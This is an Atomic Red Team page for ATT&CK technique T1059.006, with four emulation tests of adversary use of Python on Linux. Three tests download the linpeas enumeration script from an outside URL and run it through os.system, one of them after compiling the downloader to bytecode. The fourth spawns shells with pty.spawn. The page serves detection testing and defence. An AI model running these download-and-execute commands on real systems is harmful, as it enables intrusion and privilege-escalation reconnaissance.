Skip to content
Atomic Red Team
atomics
T1059.006

T1059.006 - Command and Scripting Interpreter: Python

Description from ATT&CK (opens in a new tab)

Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.(Citation: Zscaler APT31 Covid-19 October 2020)

Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.

Atomic Tests


Atomic Test #1 - Execute shell script via python's command mode arguement

Download and execute shell script and write to file then execute locally using Python -c (command mode)

Supported Platforms: Linux

auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb

Inputs:

NameDescriptionTypeDefault Value
script_urlShell script public URLstringhttps://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh (opens in a new tab)
payload_file_nameName of shell script downloaded from the script_urlstringT1059.006-payload
executorFreeBSD or Linux shellstringsh
script_argsArguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files.string-q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles

Attack Commands: Run with sh!

which_python=$(which python || which python3 || which python3.9 || which python2)
$which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'

Cleanup Commands:

rm #{payload_file_name} 
pip-autoremove pypykatz >nul 2> nul

Dependencies: Run with sh!

Description: Verify if python is in the environment variable path and attempt to import requests library.
Check Prereq Commands:
which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
Get Prereq Commands:
pip install requests


Atomic Test #2 - Execute Python via scripts

Create Python file (.py) that downloads and executes shell script via executor arguments

Supported Platforms: Linux

auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8

Inputs:

NameDescriptionTypeDefault Value
python_script_namePython script namepathT1059.006.py
script_urlShell script public URLstringhttps://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh (opens in a new tab)
payload_file_nameShell script file name downloaded from the script_urlstringT1059.006-payload
executorPayload or script interpreter / executorstringsh
script_argsArguments to check for system stats, available software, process details, environment paths, open sockets, and interesting filesstring-q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles

Attack Commands: Run with sh!

which_python=$(which python || which python3 || which python3.9 || which python2)
echo 'import requests' > #{python_script_name}
echo 'import os' >> #{python_script_name}
echo 'url = "#{script_url}"' >> #{python_script_name}
echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
echo 'session = requests.session()' >> #{python_script_name}
echo 'source = session.get(url).content' >> #{python_script_name}
echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
echo 'fd.write(source)' >> #{python_script_name}
echo 'fd.close()' >> #{python_script_name}
echo 'os.system(malicious_command)' >> #{python_script_name}
$which_python #{python_script_name}

Cleanup Commands:

rm #{python_script_name} #{payload_file_name}

Dependencies: Run with sh!

Description: Requires Python
Check Prereq Commands:
which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
Get Prereq Commands:
pip install requests


Atomic Test #3 - Execute Python via Python executables

Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments

Supported Platforms: Linux

auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa

Inputs:

NameDescriptionTypeDefault Value
python_script_nameName of Python script namepathT1059.006.py
script_urlURL hosting external malicious payloadstringhttps://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh (opens in a new tab)
payload_file_nameShell script file name downloaded from the script_urlstringT1059.006-payload
executorPayload or script interpreter / executorstringsh
script_argsArguments to check for system stats, available software, process details, environment paths, open sockets, and interesting filesstring-q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
python_binary_nameName of Python file to be compiledpathT1059.006.pyc

Attack Commands: Run with sh!

which_python=$(which python || which python3 || which python3.9 || which python2)
echo 'import requests' > #{python_script_name}
echo 'import os' >> #{python_script_name}
echo 'url = "#{script_url}"' >> #{python_script_name}
echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
echo 'session = requests.session()' >> #{python_script_name}
echo 'source = session.get(url).content' >> #{python_script_name}
echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
echo 'fd.write(source)' >> #{python_script_name}
echo 'fd.close()' >> #{python_script_name}
echo 'os.system(malicious_command)' >> #{python_script_name}
$which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")'
$which_python #{python_binary_name}

Cleanup Commands:

rm #{python_binary_name} #{python_script_name} #{payload_file_name}

Dependencies: Run with sh!

Description: Requires Python
Check Prereq Commands:
which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
Get Prereq Commands:
pip install requests


Atomic Test #4 - Python pty module and spawn function used to spawn sh or bash

Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence (opens in a new tab)

Supported Platforms: Linux

auto_generated_guid: 161d694c-b543-4434-85c3-c3a433e33792

Attack Commands: Run with sh!

which_python=$(which python || which python3 || which python3.9 || which python2)
$which_python -c "import pty;pty.spawn('/bin/sh')"
exit
$which_python -c "import pty;pty.spawn('/bin/bash')"
exit

Dependencies: Run with sh!

Description: Verify if python is in the environment variable path and attempt to import requests library.
Check Prereq Commands:
which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
Get Prereq Commands:
pip install requests